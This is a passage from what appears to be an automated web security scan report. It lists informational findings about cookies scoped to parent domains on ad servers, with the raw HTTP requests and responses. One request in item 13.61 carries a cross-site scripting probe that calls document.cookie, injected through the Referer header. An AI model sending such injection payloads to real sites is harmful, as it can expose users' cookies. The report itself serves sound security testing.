P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 24 Jan 2011 22:29:19 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


13.56. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=25473179&ahcid=639152&bimpd=JfYWx_x-jXNCK9IpMegyhUWfskX0pU8P9f7Q1yXyGzQemn_EqX28BMzorUm1RHhKGx-kTq2w2kpNwnvUPTFSYA_80oR-SV_VDSGrzVIaqwv7xQM1WSLXOFPtmTbFrBpcKHYDU3ZzQbGAadh-eeMHWfO4Zgq6ktzuNhF_bLK0LPbphxV42Q4h_ZsNyhD18qZoRsuasRkxi1Z1k2rPptD9P8PLpt1hXOJjICjWtT2yiK1991S-sQEpjv_uMS6ILCsrwnU36lwYe7slfVjZEaepylBgMkh3271niMXNcwzAAnkA3U_Zfy6PETxQfgT8J-eT3nHNrRxpSP9nzpJZWA2Oy_F-ABQAi523H0QKxGD94Z1KPSA4tJC98-OHWr7_Um1WZpe8EWvwpVEb2wDc62rx0S06fjS1aNldrC9NAsPnTeFe4dD9Jr8W6-GV7RTJi0dWCJlznOYZcJIyl5aWWTKHL8QbIlH3bhQ14447S7BulD2NXHmwdmZPdbayfYow3TS_3DJsjXLE29UpHD0D8hJpAOZI2lttlojyr18-kq0-aK4JBWy7dWMINLXjafqXKN-yikbmhRmyXpRqygwkLDH5nb3wc-cQ7FRKnITKYzO3zYW_xnlzUqpmXl7pHtXggKmUbVUxMzpfpDP-5pvCsEjEu9gSUaiszXPUJLnjJ5pOEcFJzTMxAkdIK6WQ3ZcMhBFc0GRnvhpqQeoi_DKnimnnEdWAtgHpEXC7-jTjtY7xtW70-FfeNmDs5wqwDfThppao&acp=TT4o8AAAtGwK5T0lMKVG2jUduhdCo64LBk_xIw&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14983%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 01:35:43 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 01:35:43 GMT
Content-Length: 10771


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

13.57. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
  • vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=49,123 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z1fSUUpKzMtLLcoEK1CqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d3db691@www.hotelsbycity.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:07:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
Set-Cookie: vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.58. http://ads.doclix.com/adserver/CntImprImg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/CntImprImg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
  • weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
  • monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/CntImprImg?type=msg&p=MTUtMTUwLTE0Ni0xMTEtOTgtOTAtMjUwLTE2NC0yMi00OC01Ny0xMjAtMjM1LTY0LTE5LTI0NC05Ny0xMDAtMTY4LTE5My00OC0xNTgtMjUwLTE1Mi0zNS0yMjctMjAyLTI0Ny00NC0xNjEtMTQxLTE5My0yMS0zNC0yMjgtMjEtMjktMTAzLTE2MC0xNDUtNDktMTY0LTU1LTM1LTM2LTY2LTI0NC0xODMtMTMwLTMtMTAwLTE0MC0zNC0yMTItMTQ3LTE4MC0xOTItNDUtMTAwLTIwMC0xNy0xNzItMjUxLTY3LTIxOC0xNjktMTY5LTE5NC0xODEtOTktMzktNjYtMTQ0LTgtMjQtMTQtMTgyLTgxLTEzLTI2&purl=http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html&r=1998 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Set-Cookie: daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
ETag: W/"137-1288970405000"
Last-Modified: Fri, 05 Nov 2010 15:20:05 GMT
Content-Type: image/png
Vary: Accept-Encoding
Connection: close
Content-Length: 137

.PNG
.
...IHDR.............(.4.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE......U..~....tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

13.59. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...

13.60. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=K04491 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=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; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:06:44 GMT
Content-Length: 822

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.61. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1? HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 475
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f41
...[SNIP]...

13.62. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
